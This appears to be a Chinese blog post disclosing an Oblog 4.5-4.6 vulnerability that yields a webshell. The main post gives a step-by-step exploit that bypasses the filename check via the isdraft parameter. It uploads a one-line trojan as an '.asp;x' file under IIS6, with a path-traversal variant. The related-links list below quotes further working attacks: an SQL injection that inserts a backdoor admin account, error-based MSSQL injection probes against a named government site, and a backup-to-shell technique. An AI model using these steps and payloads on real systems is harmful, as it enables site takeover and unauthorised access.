Oblog 4.5-4.6 access&mssql getshell 0day

最新推荐文章于 2018-06-26 17:04:51 发布
最新推荐文章于 2018-06-26 17:04:51 发布
阅读量472 收藏
点赞数
分类专栏: 漏洞收集 文章标签: access shell iis
影响范围:4.5 - 4.6
漏洞 需求: IIS6.0\开启会员
挖掘作者:henry
 
绝对原创,技术含量不高,但影响范围比较广..
 

漏洞文件:
AjaxServer.asp (372行)
log_filename = Trim(Request("filename"))//未过滤自定义文件名
 
AjaxServer.asp (259行)(关键)
If (oblog.chkdomain(log_filename) = False And log_filename <> "") and isdraft<>1 Then oblog.adderrstr ("文件名称不合规范,只能使用小写字母以及数字!")
 
逻辑错误,只要有一个条件不满足,则跳过.请看:
 
206行isdraft = Int(Request("isdraft")) //可控
 
isdraft=1 www.xxx.com 则成功跳过
 
漏洞利用:
 
⒈ 注册会员,发表一日志。
⒉ 修改日志,高级选项,文件名称这里写abcdefg,内容为一句话木马 源码 。然后抓包保存。
⒊ 修改表单数据,将filename改为a. asp ;x,isdraft参数为1,提交表单。
⒋ 回到博文管理,选择重新发布日志,日志地址则为SHELL地址。
 
tips: 若博文目录不可, 则可控制filename=../../data/a.asp;x
7禧
关注
专栏目录
最新ASPCMS 0DAY利用工具(附VB源码)
03-25
详细使用方法在软件窗体内已经写好,直接编译执行即可使用.截止12-3-25日仍有效. 这是一个0day的EXP最好实例.
oblog4.60漏洞
06-28
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! 1、注册一个用户,用户名script,密码123456 2、发布一篇日志,日志标题:测试一下 3、个人前台首页找到日志"测试一下",点"推荐" 4、个人后台管理,选择"常用"选项中的"推荐日志",然后点"测试一下"日志后面的修改,把摘要内容修改成: s'/**/WHERE/** /logid=1;insert/**/into/**/oblog_admin/**/(username,password,roleid)values('script','49ba59abbe56e057',0);-- 5、最后点"确认提交"按钮,如果提示修改成功,注入完成! 6、登录后台,地址/admin/admin_login.asp,输入上面的用户名和密码,登录后台成功! 转的
win环境下使用sqlmap写shell + MYSQL提权(默认就是system权限)
weixin_30606461的博客
01-23 1020
今天在来一个mysql提权 (也可以说是默认system权限提的) 在被黑站点找到一个站 先教拿shell是有注入漏洞的 有可能是root权限的注入点 可以确定是有注入漏洞的 也得到了 物理路径 这个是很有用的 如果是root权限的注入点 那我们可以考虑 写shellD:\wamp\www\js\content.php 有时候物理路径是很有用的上sqlmap注入 使用命令 这个是mys...
Oblog最新注入漏洞分析
广外女生官方BLOG
09-11 767
 Date:2008-5-15 Author:Yamato[BCT] Version:Oblog 4.5-4.6 sql 代码分析: 文件In/Class_UserCommand.asp : strMonth=Request("month") //第63行 strDay=Request("day") …… Case "month" //第84行 Dim LastDay G_P_FileName =
[送0day]代码审计就该这么来3 beescms getshell
qianduan520的博客
10-26 791
前言 上一回(http://bbs.ichunqiu.com/thread-13714-1-1.html)说到快速漏洞挖掘中的几个重点关注对象,命令执行,文件操作,sql注入。并且拿sql做为例子简单做了一次代码审计,今天换一个思路,从文件操作部分入手,毕竟 文件操作一个搞不好就是getshell,比起注入按部就班慢慢来可要爽快多了。一、关注重点 对于文件操作部分来说,首先对php内置的文件...
OBLOG4.0 OBLOG4.5漏洞利用分析
10-30
### OBLOG4.0与OBLOG4.5漏洞利用分析 #### 一、漏洞背景介绍 OBLOG是一款基于ASP技术的开源博客系统,在国内有一定的用户基础。然而,OBLOG4.0与OBLOG4.5版本中存在一个较为严重的安全漏洞,即SQL注入漏洞。这种...
Oblog 4.6
04-30
Oblog 4.6 更新日志:2009-09-28 用户blog页面生成静态化shtml文件,以减轻数据库的压力。 重新设计用户管理后台,全部div+css控制,可更换skin,读取页面更快速,并可兼容智能手机及pda等掌上设备(在treo600等...
oblog_4.6_SQL 语句
10-30
这些SQL语句是针对一个名为"oblog_4.6"的应用程序或博客平台的数据库进行操作的。让我们详细讨论一下其中涉及的知识点。 1. **SQL 语言基础**: SQL(Structured Query Language)是用于管理和处理关系数据库的...
oblog v4.6 build 20080827-ASP源码.zip
02-09
OBLOG是一款基于ASP技术构建的博客系统,其版本号为v4.6 build 20080827,表明该软件在2008年8月27日进行了更新和优化。OBLOG允许用户轻松搭建个人或企业博客,提供了文章发布、分类管理、评论互动、模板自定义等...
OBLOG 夏-昼
12-26
"OBLOG 夏-昼" 是一款以夏季为主题设计的网页模版,主要适用于个人博客或者小型网站。这款模版以其清新明亮的风格,展现了夏日的活力与温暖,旨在为访客提供一个舒适的在线阅读环境。下面将详细介绍该模版的各个组成...
mssql手工注入
热门推荐
一个码农的笔记
10-11 1万+
报错注入: 例子:www.kfgtfcj.gov.cn/lzygg/Zixun_show.aspx?id=1 【1】首先爆版本:http://www.kfgtfcj.gov.cn/lzygg/Zixun_show.aspx?id=1 and @@version>0 报错信息:在将 nvarchar 值 'Microsoft SQL Server 2008 R2 (RTM) - 10.50.1
MSSQL 批量修改方式
windowsliusheng的专栏
06-26 1298
UPDATE A SET A.Msg=A.ID FROM A inner JOIN (VALUES('10','234'),       ('20','3453'),    ('30','34534') ) B(ID,PO) ON A.ID=B.ID
怎样在oblog中添加音乐播放器
zyl661204的专栏
11-03 375
  看到别人的博客都非常漂亮,而且一打开首页就会播放音乐,很羡慕,于是就是网上查找方法,并学着自己添加了一种,还不错。下面就介绍给大家。进入自己的管理后台,选择模板——修改主模板(最好在修改前先进入模板的备份,以便在修改失败后可以恢复)——选择源码——在你认为合适的位置插上以下的代码,再点保存修改就ok了。代码一:(这个播放器不怎么好看,但效果好,有循环模式、 顺序模式、简单模式供
完全备份数据和差异备份数据的shell脚本
小雪的专栏
05-05 865
http://ccschan.blog.51cto.com/11854461/1921723
手工MSSQL注入常用SQL语句
weixin_34290390的博客
08-31 155
备用 and exists (select * from sysobjects) //判断是否是MSSQLand exists(select * from tableName) //判断某表是否存在..tableName为表名and 1=(select @@VERSION) //MSSQL版本And 1=(select db_name()) //当前数据库名and 1=(...
mssql差异备份拿shell
一个码农的笔记
03-08 5341
(1)首先: declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x4e6577706f7274 backup database @a to disk=@s; 注意:0x4e6577706f7274 这个字符串是数据库名字的十六进制数字,这个这个字符串的转换用hackbar这个小工具进行转换 这里的数据库名字是:Newpor
OBLOG Accesss 转SQL Server 常见问题及解决方法
xu的blog
12-11 1330
导读:      OBLOG Accesss 转SQL Server 常见问题及解决方法   我在想一个问题:如果博客用ACCESS数据库,能走多远?或者说,这样能为博客爱好者们提供更好的服务吗?这几乎是我的心病,昨天晚上要睡下时又想到这个问题,十分不爽,几乎爬起来转换数据库了。   我不确定自己能否修改成功,因为SQL数据库所用到的查询语句与ACCESS是有些差距的。好在以前有过修改经验
一次差异备份拿shell过程
weixin_33724059的博客
01-24 563
0x00 前言 扫描器扫到了某个网站存在目录浏览,于是便有了本文。。。 知识点科普: 1. 目录浏览 目录浏览在我个人看来是危害较大的一个漏洞,该漏洞是指“在没有默认文档的目录下,列出该目录下所有文件名及文件信息”,如果站点存在这种错误配置,***者如果知道其中目录名,则可以查看到这些目录下的文件。 2.差异备份条件 站点绝对路径 具有路径写入权限 具备当前数据库权限 0x01 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值